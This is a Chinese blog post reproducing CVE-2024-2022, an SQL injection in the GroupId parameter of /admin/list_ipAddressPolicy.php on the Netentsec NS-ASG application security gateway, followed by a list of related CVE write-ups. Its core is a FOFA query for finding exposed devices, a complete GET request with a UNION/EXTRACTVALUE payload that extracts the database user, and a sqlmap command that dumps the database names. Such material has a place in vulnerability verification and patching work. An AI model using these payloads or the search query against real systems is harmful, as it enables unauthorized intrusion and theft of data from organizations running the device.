网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2022)

最新推荐文章于 2024-08-04 19:49:37 发布
最新推荐文章于 2024-08-04 19:49:37 发布
阅读量695 收藏 4
点赞数 23
文章标签: 安全 数据库 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wan___she__pi/article/details/137052264
版权

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

网康科技的NS-ASG 应用安全网关是一种网络设备,旨在保护企业的网络和应用免受各种网络威胁和攻击。它结合了防火墙、入侵检测和防御系统(IDS/IPS)、反病毒、反垃圾邮件、VPN(虚拟专用网络)等功能,提供全面的应用层安全保护。

网康科技 NS-ASG Application Security Gateway 6.3存在一个SQL注入漏洞,由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,造成数据库信息泄露

资产搜索

app="网康科技-NS-ASG安全网关"

漏洞复现:

漏洞检测:

GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+user()),0x7e)) HTTP/1.1
Host: 
Sec-Ch-Ua: 
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

漏洞利用:

python3 sqlmap.py -u https://127.0.0.1/admin/list_ipAddressPolicy.php?GroupId=-1 --dbs

cn_大腿
关注
  • 23
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现】网康NS-ASG应用安全网关 index.php SQL注入漏洞(CVE-2024-2330)
qq_67810151的博客
03-11 561
Netentsec NS-ASG Application Security Gateway 6.3中发现了一个漏洞,被分类为危急级别。这影响了文件/protocol/index.php的一个未知部分。对参数IPAddr的操作导致了SQL注入。攻击者可以远程发起攻击。
网康科技 NS-ASG 应用安全网关 SQL注入漏洞复现(CVE-2024-2022)
0xSec
03-06 958
网康科技 NS-ASG Application Security Gateway 6.3存在一个SQL注入漏洞,由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。
网康NS-ASG应用安全网关listloginfo.php sql注入CVE-2024-3041(含批量验证poc)
weixin_43567873的博客
05-11 284
网康NS-ASG应用安全网关listloginfo.php sql注入CVE-2024-3041(含批量验证poc)
cve-2024-2022
qq_36334672的博客
03-12 372
NS-ASG安全网关是一款综合性的安全解决方案,旨在帮助企业提高网络和云应用安全性。通过数据保护、应用程序控制、访问控制和威胁防护等功能,NS-ASG能够有效应对各种安全威胁,并保护企业的重要数据和资源。该产品存在SQL注入漏洞。由于/admin/list_ipAddressPolicy.php中对参数GroupId没有进行严格的过滤和校验,未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。
Spring Messaging-远程命令执行漏洞CVE-2018-1270)
qq_43381463的博客
04-19 450
spring messaging为spring框架提供消息支持,其上层协议是STOMP,底层通信基于SockJS,在spring messaging中,其允许客户端订阅消息,并使用selector过滤消息。selector用SpEL表达式编写,并使用`StandardEvaluationContext`解析,造成命令执行漏洞
sql server 远程访问informix_微软 SQL Server 远程代码执行漏洞CVE-2020-0618)
weixin_39746794的博客
11-23 204
漏洞描述近日,微软发布了2月安全更新公告,其中CVE-2020-0618 SQL Server 远程命令执行漏洞在国内存在危害,SQL Server 在国内使用量大。Microsoft SQL Server(微软结构化查询语言服务器)是由微软公司所推出的关系型数据库解决方案。漏洞存在于ReportingServicesWebServer.dll中,Microsoft.Reporting.WebFo...
terraform-aws-asg:Terraform AWS Auto Scaling堆栈
02-04
先决条件预先配置的AWS VPC要求Terraform 0.8.0或更高版本AWS提供商组模块组模块将提供安全组,启动配置和自动扩展组资源。 ELB和简单组配置均受支持。输入变量资源标签stack_item_fullname此堆栈项目的长格式描述性...
terraform-aws-asg-dns-handler:Terraform模块,用于根据AWS Auto Scaling组中实例上的模式动态设置主机名
02-04
要求 0.12+ 2.0+用法创建一个ASG并设置asg:hostname_pattern标签,例如: asg-test-#instanceid.asg-handler-vpc.testing@Z3QP9GZSRL8IVA可以像这样在Terraform中插值: tag { key = " asg:hostname_pattern
nginx-asg-sync:NGINX Plus与Cloud Autoscaling的集成
02-10
NGINX Plus与Cloud Autoscaling的集成-nginx-asg-sync -asg-sync允许发现云提供商的扩展组的实例(虚拟机)。 支持以下提供程序: AWS Azure 当实例数量改变时,nginx-asg-sync将新实例添加到NGINX Plus配置中,并...
02-AWS-CLI-EC2-ELB-ASG-CloudWatch操作指南-v1.0.pdf
03-17
AWS-CLI-EC2-ELB-ASG-CloudWatch操作指南 核心指导文档
endurox-go:Go应用程序服务器(ASG
03-14
GO应用程序服务器(ASG) 版本:2.0.0-使用对象模式API。 ASG是Golang的应用程序服务器,它可以处理Golang中的分布式事务。 可以在不中断服务的情况下重新加载应用程序组件。 基本上,系统是面向服务的,服务器...
网络安全SQL 注入漏洞
热门推荐
kali_Ma的博客
02-23 1万+
一、漏洞描述 WordPress是一个用PHP编写的免费开源内容管理系统,由于clean_query函数的校验不当,导致了可能通过插件或主题以某种方式从而触发SQL注入的情况。这已经在WordPress5.8.3中进行了修复。影响版本可以追溯到3.7.37。 二、漏洞分析 在分析整个漏洞之前,首先可以看一下如果想要触发该漏洞漏洞代码应该是什么样子的。 new WP_Query($_POST['query_vars']) 这也就是说,传入WP_Query的参数如果可控的话,就可以利用该漏洞。接下来我们看看整
漏洞复现】网康应用安全网关(NS-ASG)-list_ipAddressPolicy-SQL注入(CVE-2024-2022)
知黑而守白
03-07 100
网康应用安全网关(NS-ASG)是一款软硬件一体化、性能卓越、集SSL与IPSec于一体的应用安全接入产品。它不仅从全链条上保障业务访问的安全性,还以极其简单的方式适配所有移动终端,更有多种链路均衡和选择技术保障使用体验。网康应用安全网关(NS-ASG) list_ipAddressPolicy 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
网康应用安全网关(NS-ASG)-list_ipAddressPolicy-SQL注入漏洞CVE-2024-2022)复现
selecthch的博客
03-12 664
攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。网康应用安全网关(NS-ASG) list_ipAddressPolicy 接口存在SQL注入漏洞网康应用安全网关(NS-ASG)-list_ipAddressPolicy-SQL注入漏洞。FOFA:app="网康-NS-ASG-应用安全网关"网康应用安全网关(NS-ASG)漏洞类别: SQL注入漏洞
网康防火墙前台RCE PoC及漏洞分析
weixin_50464560的博客
09-30 1696
漏洞描述 网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。凭借超强的应用识别能力,下一代防火墙可深入洞察网络流量中的用户、应用和内容,借助全新的高性能单路径异构并行处理引擎,在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护,帮助用户安全地开展业务并降低安全成本。 这个洞是今年hvv期间爆出来的,危害很高,因此甲方baba要求我做一下分析的工作,好家伙,开局一个漏洞名称,报告内容全靠编,安排。 在网上找一条...
【系统架构设计师】二十四、安全架构设计理论与实践②
帅次的博客
08-04 799
安全技术体系架构是对组织机构信息技术系统的安全体系结构的整体描述。安全技术体系架构的目标是建立可持续改进的安全技术体系架构的能力。根据网络中风险威胁的存在实体划分出5个层次的实体对象:应用、存储、主机、网络和物理。
供应链安全:黑客攻击 Nimble 包
最新发布
weixin_47075747的博客
08-04 760
在软件开发领域,包管理器对于管理依赖项和简化开发过程至关重要。但是,这些工具并非对漏洞免疫。今天,我们将深入研究一个有趣的案例研究,了解我如何利用 Nimble 包管理器的漏洞来接管包并可能危害系统。系好安全带;这将是一次技术之旅。
鸿蒙系统开发【加解密算法库框架】安全
2301_76813281的博客
08-02 902
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值